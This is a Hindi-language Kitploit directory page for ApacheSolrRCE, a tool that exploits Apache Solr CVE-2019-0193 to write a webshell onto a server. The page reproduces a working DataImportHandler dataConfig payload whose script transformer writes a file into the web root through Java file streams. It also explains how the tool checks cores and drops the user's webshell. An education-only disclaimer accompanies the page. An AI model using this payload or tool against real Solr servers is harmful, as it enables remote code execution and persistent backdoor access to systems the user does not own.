Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ApacheSolrRCE — ApacheSolrRCE (CVE-2019-0193) वन-क्लिक शेल लेखन; सिद्धांत यह है कि कोड निष्पादन के माध्यम से java फ़ाइल स्ट्रीम द्वारा ट्रोजन लिखा जाता है। | Kitploit
उपकरण/GitHubGitHub/freefv/apachesolrrce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubfreefv/apachesolrrce

ApacheSolrRCE

ApacheSolrRCE (CVE-2019-0193) वन-क्लिक शेल लेखन; सिद्धांत यह है कि कोड निष्पादन के माध्यम से java फ़ाइल स्ट्रीम द्वारा ट्रोजन लिखा जाता है।

रिपॉजिटरी देखें
13 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

परियोजना घोषणा

केवल सूचना सुरक्षा शिक्षा और संचार के लिए, अवैध परीक्षण और हमले के लिए उपयोग न करें।

ApacheSolrRCE

ApacheSolrRCE (CVE-2019-0193) एक क्लिक में शेल लिखता है, सिद्धांत कोड निष्पादन के माध्यम से जावा फ़ाइल स्ट्रीम द्वारा लिखा गया शेल है।

नोट: लेखक स्वयं कमजोर है, यदि आपके पास बग या अन्य आवश्यकताएं हैं, तो कृपया कोड डाउनलोड करके स्वयं संशोधित करें।

उपकरण विवरण

चूंकि इंटरनेट पर प्रसारित पेलोड केवल कमांड निष्पादन के लिए हैं और वेबशेल पर जाना सुविधाजनक नहीं है, इसलिए यह पेलोड लिखा गया है (जब 123456 इको होता है, तो इसका मतलब सफल लेखन)।

नोट: उपकरण केवल परीक्षण में सहायता कर सकता है, यदि उपकरण लिखने में असमर्थ है, तो मैन्युअल रूप से लिखने की सलाह दी जाती है।

root@kitploit:~
<dataConfig>
<dataSource name="streamsrc" type="ContentStreamDataSource" loggerLevel="TRACE" />
  <script><![CDATA[
          function poc(row){
var buf = new java.io.BufferedWriter(new java.io.FileWriter(java.net.URLDecoder.decode(java.lang.Thread.currentThread().getContextClassLoader().getResource("").getPath().toString().replaceAll("file:\/", "").split("WEB-INF")[0]+"1.txt")));buf.write(new java.lang.String(java.util.Base64.getDecoder().decode("MTIzNDU2")));buf.close();
row.put("title",123456);
return row;

}

]]></script>

<document>
    <entity
        stream="true"
        name="entity1"
        datasource="streamsrc1"
        processor="XPathEntityProcessor"
        rootEntity="true"
        forEach="/RDF/item"
        transformer="script:poc">
             <field column="title" xpath="/RDF/item/title" />
    </entity>
</document>
</dataConfig>

उपकरण उपयोग

पहले जाँच पर क्लिक करें, कोर प्राप्त करें और जाँचें कि कोई कमजोरी है या नहीं।

फिर getshell पर क्लिक करें।

नोट: अपना वेबशेल shell निर्देशिका में रखें, उपकरण स्वचालित रूप से आपके वेबशेल को ड्रॉप-डाउन सूची में लोड करेगा।

डिफ़ॉल्ट प्रॉक्सी HTTP प्रॉक्सी है, पोर्ट 8080 है, कोड में हार्डकोड किया गया है, आवश्यकता होने पर स्वयं संकलन और संशोधित करें।

विशेष धन्यवाद

solr_exploit

टूल डाउनलोड करें